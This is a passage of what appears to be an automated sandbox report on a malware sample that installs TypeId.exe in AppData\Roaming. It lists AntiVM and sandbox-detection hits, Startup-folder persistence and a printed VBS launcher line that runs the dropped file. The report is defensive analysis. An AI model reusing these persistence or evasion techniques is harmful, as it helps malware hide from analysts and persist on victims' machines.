                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3136, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 1088, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXEH
                Source: TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $CQ*C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE@
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEINYSTE
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /C:/USERS/user/APPDATA/ROAMING/TYPEID.EXEB
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE" C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEWINSTA0\DEFAULT=::=::\ALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAFPS_BROWSER_APP_PROFILE_STRING=INTERNET EXPLORERFPS_BROWSER_USER_PROFILE_STRING=DEFAULTHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILESPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=C:\PROGRAM FILES (X86)\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSESSIONNAME=CONSOLESYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWSO(~
                Source: file.exe, 00000003.00000002.2307647780.0000000006365000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE}"A
                Source: TypeId.exe, 00000008.00000002.2543225640.0000000000600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE" C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEWINSTA0\DEFAULT
                Source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2573958476.00000000034DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEF
                Source: wscript.exeBinary or memory string: IWSHSHELL3.RUN(""C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"");
                Source: TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $CQ*C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEL
                Source: TypeId.exe, 00000008.00000002.2547706995.0000000002989000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4579828279.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4553377918.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEH
                Source: TypeId.exe, 00000008.00000002.2544462222.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YC:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
                Source: TypeId.exe, 00000008.00000002.2547706995.00000000026C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXELRCQ|
                Source: TypeId.exe, 00000008.00000002.2544462222.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILES (X86)PROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=C:\PROGRAM FILES (X86)\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSESSIONNAME=CONSOLESYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C;~
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEWINSTA0\DEFAULT=::=::\ALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAFPS_BROWSER_APP_PROFILE_STRING=INTERNET EXPLORERFPS_BROWSER_USER_PROFILE_STRING=DEFAULTHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=X86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILES (X86)PROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=C:\PROGRAM FILES (X86)\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSESSIONNAME=CONSOLESYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWS
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEC
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIG.
                Source: TypeId.exe, 00000008.00000002.2547706995.0000000002989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE@
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000849000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEA
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIG=~
                Source: TypeId.exe, 00000008.00000002.2543105239.00000000004F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OTYPEID.EXE
                Source: TypeId.exe, 00000008.00000002.2543105239.00000000004F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OC:\USERS\user\APPDATA\ROAMING\TYPEID.EXEO
                Source: TypeId.exe, 0000000A.00000002.4553145963.00000000007F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEM6
                Source: wscript.exe, 00000007.00000002.2397404638.0000026A20F80000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE\??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE;EN-GBENEN-USMYAPPLICATION.APP-----------------------------------------NNJ
                Source: TypeId.exe, 00000008.00000002.2544462222.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Z:\SYSCALLS\AMSI32_1088.AMSI.CSVTA\ROAMING\TYPEID.EXEESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILES (X86)PSMODULEPATH=%``
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4553377918.0000000000C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/TYPEID.EXE
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394063737.0000026A20ED1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HTYPEID.EXE
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE]
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIG
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE0
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: XC:\WINDOWS\TEMP\ASLLOG_DETECTORSTRACE_TYPEID.EXE_1088.TXT0JX
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __FUSION_APPCFG_DOWNLOAD_ATTEMPTED__NG/TYPEID.EXE.CONFIGM~
                Source: wscript.exe, 00000007.00000002.2397468590.0000026A210D5000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4553377918.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397072368.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394187685.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2544462222.000000000078E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2542948122.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2578986604.0000000005BF0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002844000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002627000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000028E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KXC:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_1088.TXTXUX
                Source: TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $CQ1C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIG
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZC:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEINN
                Source: TypeId.exe, 00000008.00000002.2547706995.0000000002989000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXELRCQH
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TC:\USERS\user\APPDATA\ROAMING\TYPEID.EXE/$
                Source: wscript.exe, 00000007.00000002.2397468590.0000026A210D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LL3.RUN(""C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"");
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERS\user\APPDATA\ROAMING\TYPEID.EXEATA=C:\USERS\user\APPDATA\ROAMINGCOMMONP
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOGPF
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEY*
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE" )~
                Source: TypeId.exe, 00000008.00000002.2544462222.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =YC:\USERS\user\APPDATA\ROAMING\TYPEID.EXE'~
                Source: TypeId.exe, 00000008.00000002.2542879485.000000000015C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ING\TYPEID.EXEV
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/TYPEID.EXEIG
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEQ*
                Source: TypeId.exe, 0000000A.00000002.4553377918.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319;C:\WC:\USERS\user\APPDATA\ROAMING\TYPEID.EXES;.
                Source: wscript.exe, 00000007.00000003.2394222601.0000026A20EAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397050155.0000026A20EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
                Source: wscript.exe, 00000007.00000002.2397468590.0000026A210D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (X"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
                Source: wscript.exe, 00000007.00000002.2397072368.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394187685.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmp, TypeId.vbs.3.drBinary or memory string: CREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE!~
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_1088.TXTHFX
                Source: TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXET-CQ
                Source: wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ; TYPEID.EXEF
                Source: TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $CQ1C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE.CONFIGJ
                Source: wscript.exe, 00000007.00000002.2397072368.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394187685.0000026A20EB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""D.VBS
                Source: TypeId.exe, 00000008.00000002.2542920686.00000000001C0000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE\??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE;EN-GBENEN-USMYAPPLICATION.APPVQ
                Source: wscript.exe, 00000007.00000002.2397468590.0000026A210D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBSCRIPT - SCRIPT BLOCKCREATEOBJECT("WSCRIPT.SHELL").RUN """C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"""
                Source: TypeId.exe, 00000008.00000002.2547706995.000000000253E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXELRCQ`
                Source: file.exe, 00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: wscript.exe, 00000007.00000002.2397468590.0000026A210D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,"C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE"
                Source: TypeId.exe, 00000008.00000002.2544462222.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |CROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG~N
                Source: TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\ROAMING\TYPEID.EXEM~
                Source: TypeId.exe, 00000008.00000002.2578986604.0000000005BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\USERS\user\APPDATA\ROAMING\TYPEID.EXE-WG
                Source: file.exe, 00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003A5A000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2394256938.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2397284937.0000026A20EE2000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2544462222.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2544462222.0000000000849000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.0000000002778000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2585485506.0000000006A70000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000026C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE
                Source: TypeId.exe, 00000008.00000002.2544462222.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OC:\USERS\user\APPDATA\ROAMING\TYPEID.EXE
                Source: TypeId.exe, 00000008.00000002.2544462222.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_1088.TXT
